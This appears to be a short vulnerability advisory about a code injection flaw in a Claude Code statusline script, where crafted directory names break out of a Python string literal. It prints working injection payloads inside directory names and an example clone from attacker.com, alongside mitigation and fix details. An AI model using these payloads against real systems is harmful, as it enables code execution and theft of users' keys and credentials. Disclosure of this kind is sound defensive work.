Listen to this Post
The vulnerability exists in `tools/quota-statusline.sh` (introduced in v3.5.0). Claude Code’s statusline hook passes a JSON payload via stdin, containing user-controlled path fields like cwd, workspace.current_dir, workspace.project_dir, and transcript_path. The script reads stdin into `$input` and embeds it directly into a Python triple‑quoted string literal: json.loads('''$input'''). A malicious directory name containing the byte sequence `”’` closes the literal early. Any following Python code (e.g., '''+__import__('os').system('id')+''') is then executed by the Python interpreter inside the victim’s Claude Code process. An attacker can place such a hostile path on disk via git clone, archive extraction, npm package, or downloaded zip. The victim only needs to `cd` into that directory while having the recommended statusline configuration active. The hook fires on every UI redraw, causing persistent code execution at the user’s privilege level – exposing shell, SSH keys, files, and local credentials. The vulnerable pattern uses unsanitized string interpolation into a Python one‑liner. The fix replaces it with a bash heredoc (<<'PYEOF') and passes data via os.environ.get('CC_INPUT'), eliminating shell and Python interpolation entirely.
dailycve form:
Platform: Claude Code
Version: v3.5.0, v3.5.1
Vulnerability: statusline code injection
Severity: Critical
date: 2026-05-07
Prediction: Patch date 2026-05-07
What Undercode Say:
Simulate injection via hostile directory
mkdir "test'''+<strong>import</strong>('os').system('touch /tmp/pwned')+'''"
cd "test'''+<strong>import</strong>('os').system('touch /tmp/pwned')+'''"
When statusline hook runs, /tmp/pwned is created
Exploit:
Attacker plants malicious path
git clone https://attacker.com/repo.git
cd repo/subdir/"'''+<strong>import</strong>('subprocess').call(['xterm'])+'''"
Victim cd's into it -> xterm spawns
Protection from this CVE:
- Upgrade to Claude Code v3.5.2 or later.
- Remove statusLine entry from ~/.claude/settings.json.
- Replace tools/quota-statusline.sh with safe heredoc version (see fix in ).
Impact:
Local code execution at user privilege, persistent on every redraw, full access to user’s files, SSH keys, tokens, and terminal session. No interaction beyond entering a hostile directory.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

